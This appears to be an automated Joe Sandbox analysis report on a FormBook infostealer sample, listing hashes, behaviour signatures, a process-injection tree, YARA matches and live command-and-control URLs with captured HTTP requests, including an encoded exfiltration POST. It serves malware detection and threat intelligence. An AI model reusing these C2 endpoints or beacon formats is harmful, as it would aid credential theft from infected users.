Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BMhDm7YW62.exe

Overview

General Information

Sample name:BMhDm7YW62.exe
renamed because original name is a hash value
Original sample name:3cc5b7aa1246d1f0bce5ffcabaa0525c40214012fc13998c711ac741ae71d4ce.exe
Analysis ID:1355500
MD5:67c64609c2542690d1d652d085a8f2bf
SHA1:8017c9b1b9273f49bdc02e4b90de1cb767202c0b
SHA256:3cc5b7aa1246d1f0bce5ffcabaa0525c40214012fc13998c711ac741ae71d4ce
Tags:exe
Infos:

Detection

FormBook, NSISDropper
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected NSISDropper
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • BMhDm7YW62.exe (PID: 3464 cmdline: C:\Users\user\Desktop\BMhDm7YW62.exe MD5: 67C64609C2542690D1D652D085A8F2BF)
    • okawzsv.exe (PID: 6424 cmdline: "C:\Users\user\AppData\Local\Temp\okawzsv.exe" MD5: 7673BEFD936A20FA9EB874383DEEDBFF)
      • okawzsv.exe (PID: 5188 cmdline: C:\Users\user\AppData\Local\Temp\okawzsv.exe MD5: 7673BEFD936A20FA9EB874383DEEDBFF)
        • zIlFieNVyhhCXAVrseNWP.exe (PID: 2556 cmdline: "C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • typeperf.exe (PID: 7512 cmdline: C:\Windows\SysWOW64\typeperf.exe MD5: 93925D4F55465CFC73C4CDF7F8B1F375)
            • zIlFieNVyhhCXAVrseNWP.exe (PID: 2016 cmdline: "C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 7904 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x27990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13bdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x27990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13bdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.okawzsv.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.okawzsv.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ae33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17082:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          5.2.okawzsv.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            5.2.okawzsv.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2a033:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16282:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.fortunetravelsltd.com/m858/?yRV=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FDvJTGXu41Kek/g==&GJ=C4IdWhJXSFOXR8DAvira URL Cloud: Label: malware
            Source: http://porousworld.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=xSDcG6jAvira URL Cloud: Label: malware
            Source: http://www.cjjmobbbshhhu.shop/m858/Avira URL Cloud: Label: malware
            Source: http://www.belaflorloja.online/m858/Avira URL Cloud: Label: malware
            Source: http://www.speedbikesglobal.com/m858/Avira URL Cloud: Label: malware
            Source: http://www.sorenad.com/m858/Avira URL Cloud: Label: malware
            Source: https://rytrk.com/track.Avira URL Cloud: Label: malware
            Source: http://www.porousworld.com/m858/Avira URL Cloud: Label: malware
            Source: http://www.lets-room.online/m858/Avira URL Cloud: Label: malware
            Source: http://www.speedbikesglobal.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIi3MNbBvSEuUIdbw==Avira URL Cloud: Label: malware
            Source: http://www.greenharbor.info/m858/Avira URL Cloud: Label: malware
            Source: http://www.greenharbor.info/m858/?yRV=l3PhQIcXSIPbTWu7p/uiREsJUVtNOEFcSOOLMhvnuN6H7BalBQjl+86I6Nr3Qdue789gEwulMvGUQuhGePztwTHWY2ExuMUqrQ==&GJ=C4IdWhJXSFOXR8DAvira URL Cloud: Label: malware
            Source: http://www.fortunetravelsltd.com/m858/Avira URL Cloud: Label: malware
            Source: http://sorenad.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJAvira URL Cloud: Label: malware
            Source: https://rytrk.comAvira URL Cloud: Label: malware
            Source: http://www.medical-loan24.live/m858/Avira URL Cloud: Label: malware
            Source: http://www.ozzventures.shop/m858/?GJ=C4IdWhJXSFOXR8D&yRV=E3d5DyrEcfJbX1PJB/KGYac5KRSYq3LrneiR+hvnGmPole79cfvMffiwEvZVyE+NwNCm4kMx2S50UNzNVB064navYR89b2jcsA==Avira URL Cloud: Label: malware
            Source: http://www.belaflorloja.online/m858/?yRV=7ouShKyUNVA5Yjh6oktqXavps0HIih1xZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZpKv2rLMaYp9lnA==&GJ=C4IdWhJXSFOXR8DAvira URL Cloud: Label: malware
            Source: http://www.cjjmobbbshhhu.shop/m858/?yRV=VXEesAUKk48GI7/v/F/vk/2J7KfCFYqlfqdzSz80FcScnenugkkRQu/gNtJifjh8nwe2JaaLs5Szx6+RWLiYozgxOSovEmgHpQ==&GJ=C4IdWhJXSFOXR8DAvira URL Cloud: Label: malware
            Source: http://www.sorenad.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dIPmy2erOJpsQ9g==Avira URL Cloud: Label: malware
            Source: http://fortunetravelsltd.com/m858/?yRV=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjwAvira URL Cloud: Label: malware
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeReversingLabs: Detection: 64%
            Multi AV Scanner detection for submitted file
            Source: BMhDm7YW62.exeReversingLabs: Detection: 54%
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.okawzsv.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.okawzsv.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeJoe Sandbox ML: detected
            Source: BMhDm7YW62.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Binary string: firefox.pdbP source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000000.1350794169.0000000000BCE000.00000002.00000001.01000000.00000006.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000000.1483436758.0000000000BCE000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: typeperf.pdb source: okawzsv.exe, 00000005.00000002.1429982812.00000000005D8000.00000004.00000020.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000003.1817748290.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: okawzsv.exe, 00000002.00000003.1274910552.000000001CF60000.00000004.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000002.00000003.1278096689.000000001D140000.00000004.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000003.1348854988.0000000000883000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000003.1346736464.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000BCE000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1429101996.0000000002F6A000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1431661373.000000000311F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: okawzsv.exe, okawzsv.exe, 00000005.00000003.1348854988.0000000000883000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000003.1346736464.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000BCE000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, typeperf.exe, 0000000B.00000003.1429101996.0000000002F6A000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1431661373.000000000311F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\xampp\htdocs\cdf5e02cc6bc498bb3e1a68a897b97eb\Loader\Release\Loader.pdb source: BMhDm7YW62.exe, 00000000.00000002.1295073357.0000000002914000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp, okawzsv.exe, 00000002.00000000.1266849062.0000000000426000.00000002.00000001.01000000.00000004.sdmp, okawzsv.exe, 00000005.00000000.1273203469.0000000000426000.00000002.00000001.01000000.00000004.sdmp, typeperf.exe, 0000000B.00000002.3736723872.0000000003633000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3733581608.0000000002DC0000.00000004.00000020.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000000.1483909115.0000000002C73000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1663743072.00000000166C3000.00000004.80000000.00040000.00000000.sdmp, okawzsv.exe.0.dr
            Source: Binary string: typeperf.pdbGCTL source: okawzsv.exe, 00000005.00000002.1429982812.00000000005D8000.00000004.00000020.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000003.1817748290.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00401570 FindFirstFileW,FindNextFileW,FindClose,2_2_00401570
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0293C010 FindFirstFileW,FindNextFileW,FindClose,11_2_0293C010
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 4x nop then pop edi11_2_02931810
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 4x nop then xor eax, eax11_2_029299A0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 4x nop then pop edi11_2_0292E0C7
            Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
            Source: Joe Sandbox ViewIP Address: 207.244.126.150 207.244.126.150
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=E3d5DyrEcfJbX1PJB/KGYac5KRSYq3LrneiR+hvnGmPole79cfvMffiwEvZVyE+NwNCm4kMx2S50UNzNVB064navYR89b2jcsA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.ozzventures.shopConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?yRV=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FDvJTGXu41Kek/g==&GJ=C4IdWhJXSFOXR8D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fortunetravelsltd.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=xSDcG6j+Ey2rPqhzwDdzjJVnVNgkT4rk7B/VgGxpF9KJHhiy72u20ZI8z6z+NNUSjVU02PDtrOX7gmvolmuvPl/watolDMLePw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.porousworld.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?yRV=l3PhQIcXSIPbTWu7p/uiREsJUVtNOEFcSOOLMhvnuN6H7BalBQjl+86I6Nr3Qdue789gEwulMvGUQuhGePztwTHWY2ExuMUqrQ==&GJ=C4IdWhJXSFOXR8D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.greenharbor.infoConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=OT9XPYCRU0j98Hg/1uDBlXaBM2XXKmT/I6iFF8QONKz/+dd2eTQvqRBLoPpbyNuYQnsLqtRbnM1ZEfE8nLSuQup3k418CZKp1g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.lets-room.onlineConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dIPmy2erOJpsQ9g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.sorenad.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?yRV=IsVLP75BXPV29irb7QUBT0f93P2nzsiWNaG7Z6nH6v/C9T4Z/rVV4+geNHA05yDya3IUff47iHu4NOYvgxXZ16OgIRZyd1QpzQ==&GJ=C4IdWhJXSFOXR8D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.medical-loan24.liveConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIi3MNbBvSEuUIdbw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.speedbikesglobal.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?yRV=7ouShKyUNVA5Yjh6oktqXavps0HIih1xZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZpKv2rLMaYp9lnA==&GJ=C4IdWhJXSFOXR8D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.belaflorloja.onlineConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3QsCSEIlQr7ZxZGtQx938wNB79Up+t5frQyoMoLXF0pSDhyD7Jeln3ZaQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.blessingstation.orgConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?yRV=VXEesAUKk48GI7/v/F/vk/2J7KfCFYqlfqdzSz80FcScnenugkkRQu/gNtJifjh8nwe2JaaLs5Szx6+RWLiYozgxOSovEmgHpQ==&GJ=C4IdWhJXSFOXR8D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.cjjmobbbshhhu.shopConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=unslu3ANnB0jwEgO8dBJ1wGsM1BVB71C8A+lB2lk4lRhZ2GNTPRbQ9k43BlJiddJ5udbRNs+X5XglvYJR+tWtyoxijgasWwkkQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.hillcresthealth.onlineConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=vUVAFHoFovduHd4/DKwXed3af3ePb0vry6dcW+l5/zrb0ZZNrBa0Shr1AhFt6JSAxzoXU5EndMSNZsLwoEVPBH0RooK5H1Vl7g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.hmoatl.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?yRV=coEloaOWB4ccjb+v6cLGO3+aXUsmpIWjCRRWxfkEZg7Qbr+sYY/0Gc0G57svkQNplbCaP8Xe0B9P1hE+GhuMVBij7PKQzh7NHQ==&GJ=C4IdWhJXSFOXR8D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.633922.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: unknownDNS traffic detected: queries for: www.ozzventures.shop
            Source: unknownHTTP traffic detected: POST /m858/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.fortunetravelsltd.comOrigin: http://www.fortunetravelsltd.comReferer: http://www.fortunetravelsltd.com/m858/Content-Length: 184Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+Data Raw: 79 52 56 3d 55 52 4f 52 55 4c 4f 6c 58 72 42 39 6a 44 74 37 6c 43 65 47 53 4e 67 31 77 31 6f 31 45 52 32 79 39 50 4a 46 4f 55 68 72 41 75 6c 71 69 71 37 71 70 51 4d 58 67 56 32 37 6d 69 31 44 32 61 7a 35 59 77 4b 57 64 66 4e 72 75 75 69 50 68 36 4a 42 35 4e 50 43 42 4d 51 77 50 31 65 76 6a 61 53 53 6a 73 42 32 6f 48 55 78 43 54 32 6a 36 4f 5a 4f 43 65 76 59 2b 77 62 78 2b 2b 47 66 47 69 59 2f 4c 64 46 77 48 45 5a 42 50 38 54 30 34 4b 4f 78 79 36 54 44 51 53 4b 45 38 6c 71 33 41 46 32 74 5a 79 57 5a 66 4a 48 6d 50 76 77 30 4f 68 58 4e 45 51 3d 3d Data Ascii: yRV=URORULOlXrB9jDt7lCeGSNg1w1o1ER2y9PJFOUhrAulqiq7qpQMXgV27mi1D2az5YwKWdfNruuiPh6JB5NPCBMQwP1evjaSSjsB2oHUxCT2j6OZOCevY+wbx++GfGiY/LdFwHEZBP8T04KOxy6TDQSKE8lq3AF2tZyWZfJHmPvw0OhXNEQ==
